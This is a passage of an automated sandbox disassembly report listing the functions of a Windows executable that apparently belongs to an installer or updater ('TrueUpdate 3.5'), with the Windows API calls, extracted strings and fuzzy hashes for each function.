                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004C81B8
                                                                                  • BeginDeferWindowPos.USER32(00000008), ref: 004C81C6
                                                                                  • GetTopWindow.USER32(?), ref: 004C81D8
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004C81E7
                                                                                  • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 004C8219
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C8222
                                                                                  • CopyRect.USER32(?,?), ref: 004C823E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3332788312-0
                                                                                  • Opcode ID: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                  • Instruction ID: dd2873b391f69817bde92f91f5f7798a798dc3d4c8ff5fde14c979dea33df2ed
                                                                                  • Opcode Fuzzy Hash: 2f039f0fc31fecbdcac67ecd7a94f3bbace289618eba1bc2681dcdd903cbdd7d
                                                                                  • Instruction Fuzzy Hash: F9414779900619EFCF50CF94D888AEEB7B5FF48340B1541AEE905A7211CB389E41CBA9
                                                                                  Function 00418932 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 464COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00418937
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041BA62: __EH_prolog.LIBCMT ref: 0041BA67
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0041C471: __EH_prolog.LIBCMT ref: 0041C476
                                                                                    • Part of subcall function 0041C471: GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                    • Part of subcall function 0041C471: GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                    • Part of subcall function 0041C471: SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                    • Part of subcall function 0041C471: DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 0041A33B: __EH_prolog.LIBCMT ref: 0041A340
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$FileInterlocked$IncrementTemp$AttributesDecrementDeleteNamePathlstrlen
                                                                                  • String ID: 0:R$Content-Type: application/x-www-form-urlencoded$Incorrect HTTP status returned by server: %d$MSG_INITIALIZING$TrueUpdate 3.5
                                                                                  • API String ID: 716760990-2677761981
                                                                                  • Opcode ID: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                  • Instruction ID: 7ad473c514a72808bbc6291213c6efbab76e7b9ada64fe613558528b0dac4d64
                                                                                  • Opcode Fuzzy Hash: 2a05be3a193107ff33914d025b806101e9a4f7c69246c4ba78369640d6c6722e
                                                                                  • Instruction Fuzzy Hash: E9125D75900249EFCF14EFA5C985EEEBBB9BF14304F00415EF506A3281DB78AA84CB65
                                                                                  Function 004BC00B Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 241fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 004BC1BE
                                                                                  • GetLastError.KERNEL32 ref: 004BC1CA
                                                                                  • GetFileType.KERNEL32(00000000), ref: 004BC1DF
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004BC1EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateErrorHandleLastType
                                                                                  • String ID: @$H
                                                                                  • API String ID: 1809617866-104103126
                                                                                  • Opcode ID: 1500813310131fe4c6ee9c1ba9e423d11943816b0715029057323d9edd96e570
                                                                                  • Instruction ID: f1bfe6cf48644e7f6ad8d24aaebeefab697faa0ad4a5076101811a8fddd81a35
                                                                                  • Opcode Fuzzy Hash: 1500813310131fe4c6ee9c1ba9e423d11943816b0715029057323d9edd96e570
                                                                                  • Instruction Fuzzy Hash: 22811831D0424596EF24AFA888C47EF7B609F01368F14425BE9617A3D2C7BC89458BBE
                                                                                  Function 00430915 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 191libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043091A
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiEnumPatchesA), ref: 00430968
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                    • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen$AddressFreeHeapLibraryLoadProc
                                                                                  • String ID: 0:R$MsiEnumPatchesA$PatchCode$TransformList
                                                                                  • API String ID: 1053048375-1542265820
                                                                                  • Opcode ID: cd6f0d8db1d8cce12e43ad3bbf7bb3a3b24f07ffa98d04c47fca6015fdb21ac9
                                                                                  • Instruction ID: 36e6676ba8e9ab5c250fd7ea8ff446ebc7f351a2aa8b5b7f98af7c5f2420abf1
                                                                                  • Opcode Fuzzy Hash: cd6f0d8db1d8cce12e43ad3bbf7bb3a3b24f07ffa98d04c47fca6015fdb21ac9
                                                                                  • Instruction Fuzzy Hash: 8F619A75C00219AADB04FBE5DC92FEEBB78AF18318F24550EF412721C2DB7C5A458769
                                                                                  Function 0040D372 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0040D415
                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D470
                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040D4AC
                                                                                  • __EH_prolog.LIBCMT ref: 0040D377
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0040D5C1: IsWindow.USER32(?), ref: 0040D5CE
                                                                                    • Part of subcall function 0040D5C1: __ftol.LIBCMT ref: 0040D5E6
                                                                                    • Part of subcall function 0040D5C1: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0040D5F7
                                                                                    • Part of subcall function 0040D5FF: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D617
                                                                                    • Part of subcall function 0040D5FF: PostQuitMessage.USER32(00000000), ref: 0040D63A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMessage$Attributes$DeleteH_prologIncrementInterlockedPeekPostQuitSendWindow__ftol
                                                                                  • String ID: Delete failed$Delete successful
                                                                                  • API String ID: 1022885681-1341195639
                                                                                  • Opcode ID: edc6d10dc85417653160089f0e2d933e9ec50428332c35c9effff81e7997e2f6
                                                                                  • Instruction ID: e419cf4d07bc22df3f324dea5daa4c563de52bfa1d027d2376815d3f2fbc1ed4
                                                                                  • Opcode Fuzzy Hash: edc6d10dc85417653160089f0e2d933e9ec50428332c35c9effff81e7997e2f6
                                                                                  • Instruction Fuzzy Hash: 6D714274E00605DFCB14EFA9C9859AEBBF1FF08708B40492EF546B7281C778A945CB99
                                                                                  Function 004C0E63 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(004BD3DC,004BD3DC,00000000,00000000,00000001,000000FF,004EF72C,00000000,?,?,00000000,00000000,00522DE4), ref: 004C0FCA
                                                                                  • GetLastError.KERNEL32 ref: 004C0FD2
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C100F
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 004C101C
                                                                                  • CloseHandle.KERNEL32(?), ref: 004C1025
                                                                                  • CloseHandle.KERNEL32(?), ref: 004C1032
                                                                                  • CloseHandle.KERNEL32(004BD438), ref: 004C1042
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 966596688-0
                                                                                  • Opcode ID: 76d7ccea1360e0e16644caf6b78471d6f3fbb6ccdcc69dc107643572a4460b60
                                                                                  • Instruction ID: 1c58c4054bb77eb2f130e73875bc98866416ed5e31c43f0082e1ee3092fc7960
                                                                                  • Opcode Fuzzy Hash: 76d7ccea1360e0e16644caf6b78471d6f3fbb6ccdcc69dc107643572a4460b60
                                                                                  • Instruction Fuzzy Hash: 03614739804248DFCB219F68CC44FEEBBB5EF16314F10815FE4219B2A2C7B99845CB64
                                                                                  Function 00424332 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 168COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424358
                                                                                  • __ftol.LIBCMT ref: 00424367
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                    • Part of subcall function 0045468E: SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                    • Part of subcall function 0045468E: SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                    • Part of subcall function 0045468E: SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                    • Part of subcall function 0045468E: SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prolog__ftol
                                                                                  • String ID: Checked$ItemData$Selected$Text
                                                                                  • API String ID: 4274534877-779246079
                                                                                  • Opcode ID: b3f4bc011db87e945d604592dfb29393742bbc81f413076ea15391b0bcc94f2b
                                                                                  • Instruction ID: 0ddb7305cbaec2757157c644248406dd5e87f73e4c70d122857bba50fbedb303
                                                                                  • Opcode Fuzzy Hash: b3f4bc011db87e945d604592dfb29393742bbc81f413076ea15391b0bcc94f2b
                                                                                  • Instruction Fuzzy Hash: 7F41573160552479E7157726AC83FEF365DDF82368F20460FF911A51C2EF6C5A8243AE
                                                                                  Function 0042839B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004283A0
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 00428425
                                                                                  • ShellExecuteA.SHELL32(?,open,00000000,?,00000000,00000000), ref: 00428470
                                                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,?,00000000,00000000), ref: 004284C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ExecuteShell$__ftollstrlen
                                                                                  • String ID: $open
                                                                                  • API String ID: 899862102-119239145
                                                                                  • Opcode ID: 1ddbc1df1c3f2274b6a7e5647c1af4a7b3f83dc969544a2baf5c35a32cbeef07
                                                                                  • Instruction ID: 84366092f8816621cbad6baf36ccbf8e68f38dc8e5aef6262cddb001f3d95030
                                                                                  • Opcode Fuzzy Hash: 1ddbc1df1c3f2274b6a7e5647c1af4a7b3f83dc969544a2baf5c35a32cbeef07
                                                                                  • Instruction Fuzzy Hash: 76419176905228AEDB14FBB5EC42EEF7B68EF05314F10412FF411B21C2EF385A858669
                                                                                  Function 004303A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 139libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004303AC
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetShortcutTargetA), ref: 004303F3
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                  • String ID: 0:R$ComponentCode$FeatureId$MsiGetShortcutTargetA
                                                                                  • API String ID: 730962311-3930607590
                                                                                  • Opcode ID: 87eef367d14b115e18cc56f594158bfe713cb9c4ef14f178e1523b7f86c30e96
                                                                                  • Instruction ID: d4ef9a3571dd391edcb842ac1d30551f098ba135a01794bb31a5e61118261d8a
                                                                                  • Opcode Fuzzy Hash: 87eef367d14b115e18cc56f594158bfe713cb9c4ef14f178e1523b7f86c30e96
                                                                                  • Instruction Fuzzy Hash: 9A411235800215B6CB01F7A2CC52FFE7A289F52768F14421FF812721D2DF6C1B42C6AA
                                                                                  Function 0040D026 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • Source did not have drive specifier, xrefs: 0040D114
                                                                                  • Source ends with a slash, xrefs: 0040D0CF
                                                                                  • Source was empty, xrefs: 0040D061
                                                                                  • Source was less than 4 characters, xrefs: 0040D082
                                                                                  • Source contains invalid character, xrefs: 0040D165
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Source contains invalid character$Source did not have drive specifier$Source ends with a slash$Source was empty$Source was less than 4 characters
                                                                                  • API String ID: 3519838083-1937954483
                                                                                  • Opcode ID: 9010d3e2c4c4f5af15fbfe4c61d6790b34d6fc6a109ad857cf1fcf857db86452
                                                                                  • Instruction ID: 5af68de5f2039e3590ac2d6ef3682b23daff5cfb3da4abda2120284fd16a790c
                                                                                  • Opcode Fuzzy Hash: 9010d3e2c4c4f5af15fbfe4c61d6790b34d6fc6a109ad857cf1fcf857db86452
                                                                                  • Instruction Fuzzy Hash: 3C41D575B002069BDB14EBA5C996EAEBBB0AF44714F10412FF105FB3D1CFB85A45878A
                                                                                  Function 00444042 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • Source did not have drive specifier, xrefs: 004440F1
                                                                                  • Source ends with a slash, xrefs: 00444131
                                                                                  • Source was empty, xrefs: 0044407E
                                                                                  • Source was less than 4 characters, xrefs: 0044409F
                                                                                  • Source contains invalid character, xrefs: 00444182
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Source contains invalid character$Source did not have drive specifier$Source ends with a slash$Source was empty$Source was less than 4 characters
                                                                                  • API String ID: 3519838083-1937954483
                                                                                  • Opcode ID: bf18c7de1cd839a580f0367d941139d82415c67f2c850bfc82b94c9128720514
                                                                                  • Instruction ID: b3acbfe35c2314af9ce1d7c65955aa3747a71a84e8ae8f816319af8903ad8055
                                                                                  • Opcode Fuzzy Hash: bf18c7de1cd839a580f0367d941139d82415c67f2c850bfc82b94c9128720514
                                                                                  • Instruction Fuzzy Hash: E74107347403059FEB14EBA5C996FBE7BB0AF94704F10412FF102A72C1CBB85985875A
                                                                                  Function 004441B5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
